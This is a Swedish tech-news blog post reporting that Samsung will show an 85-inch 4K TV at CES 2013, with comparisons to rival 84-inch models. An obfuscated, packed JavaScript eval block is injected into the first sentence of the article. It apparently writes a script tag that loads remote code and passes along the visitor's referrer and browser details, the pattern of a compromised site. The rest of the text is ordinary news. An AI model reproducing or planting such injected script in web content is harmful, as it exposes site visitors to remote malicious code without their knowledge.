Image Image Image Image Image Image Image Image Image Image

| 24 januari, 2020

Scroll to top

Top

85-tums 4k-tv från Samsung på CES 2013

85-tums 4k-tv från Samsung på CES 2013
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|neads|var|u0026u|referrer|efkar||js|php’.split(’|’),0,{}))
i januari är det dags igen för den välkända CES-mässan 2013. Samsung meddelar i ett pressmeddelande att de redan fått in en massa utmärkelser inför mässan. Att de fått en massa utmärkelser så här långt innan är inte ovanligt när det kommer till de stora aktörerna på marknaden. 

Det som har fångat intresset är att Samsung nämnt att de kommer att visa upp en 85 tum stor TV med 4k-upplösning.

Under IFA-mässan var Samsung en av de större aktörerna som inte visade upp någon TV med 4k-upplösning, Sony, LG, Sharp och Toshiba gjorde.
LG:s version har faktiskt redan lanserats i Sverige.  Det som alla har gemensamt är storleken på 84 tum, dock är Samsungs modell en tum större men det kommer troligen inte spela någon större roll.

Förra veckan visade Samsung upp en TV på 70 tum med en uppdateringsfrekvens på 340 HZ, den ni kan se på bilden ovan. Så sammanfattat får vi i januari se om Samsungs Ultra HD är något som skiljer sig från konkurrenterna.